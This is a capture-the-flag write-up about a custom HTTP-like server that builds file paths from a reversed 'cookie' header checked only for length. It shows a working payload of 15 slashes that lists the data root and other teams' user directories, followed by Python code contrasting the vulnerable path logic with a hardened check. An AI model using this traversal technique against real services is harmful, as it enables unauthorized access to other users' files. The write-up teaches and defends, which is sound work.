Created May 29, 2019
We noticed that the server logs debug info to stdout. Our first idea was path traversal, because the server stores files under names taken from the request:

path = './' + eikooc + '/' + path

Path traversal in the path itself didn't work at all, but eikooc (the reversed cookie) turned out to be a user directory name. So we sent this payload:

TEG / PTTH\1.1
eikooc: ../

and got this log message:


TEG / PTTH\1.1

eikooc: eikooc: ../

found cookie
[PID 20] [] Fucked up cookie. CLIENT

OK, we checked the condition that produces this message (reconstructed from the binary; some_function and some_ptr are our placeholder names):

if (some_function(some_ptr) == 15) {
  /* cookie accepted, request continues */
} else {
  throw_error("Fucked up cookie.");
}

Hmm, it looks like some_function is just strlen and some_ptr is the eikooc pointer: the only check on the cookie is its length. So we sent this payload, with exactly 15 slashes in eikooc, so that the length check passes while the directory component collapses to the data root:

TEG / PTTH\1.1
eikooc: ////////////////////

PTTH\0.1 2 KO
eikooc: ///////////////
eicookh: 093edf9115dc3ca072233b96e38f2752

<title>Index of data</title>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>

Got it! This request lists all usernames, and now we can fetch every flag the same way the jury does.
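The root cause above is a user directory name taken from a request header and validated only by length. The following is an added example, not code from the challenge, that models the vulnerable path construction next to a hardened version; DATA_ROOT, the 15-character alphanumeric policy, and the function names are assumptions for the demo.

```python
import os
import re

# Constructed data root for the example; the real server used './'.
DATA_ROOT = "/srv/data"
# Assumed policy: a user directory is exactly 15 alphanumeric characters,
# matching the names seen in the listing (e.g. MskBs9WDwWdlj1p).
USER_DIR_RE = re.compile(r"[A-Za-z0-9]{15}")


def build_path_vulnerable(eikooc: str, path: str) -> str:
    """Mirrors the writeup's logic: only strlen(eikooc) == 15 is checked, so
    15 slashes pass and normalise away, landing on the data root itself."""
    if len(eikooc) != 15:
        raise ValueError("Fucked up cookie.")
    return os.path.normpath(DATA_ROOT + "/" + eikooc + "/" + path)


def build_path_hardened(eikooc: str, path: str) -> str:
    """Treat the cookie as an opaque identifier with a strict charset, then
    confirm the normalised target still lies inside that user's directory.
    (A deployed check would also resolve symlinks with os.path.realpath.)"""
    if not USER_DIR_RE.fullmatch(eikooc):
        raise ValueError("Fucked up cookie.")
    user_dir = os.path.join(DATA_ROOT, eikooc)
    # lstrip('/') so an absolute `path` cannot discard the prefix in join()
    target = os.path.normpath(os.path.join(user_dir, path.lstrip("/")))
    if target != user_dir and not target.startswith(user_dir + os.sep):
        raise ValueError("path escapes user directory")
    return target


if __name__ == "__main__":
    print(build_path_vulnerable("/" * 15, ""))  # resolves to the data root
    try:
        build_path_hardened("/" * 15, "")
    except ValueError as exc:
        print("hardened:", exc)
```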
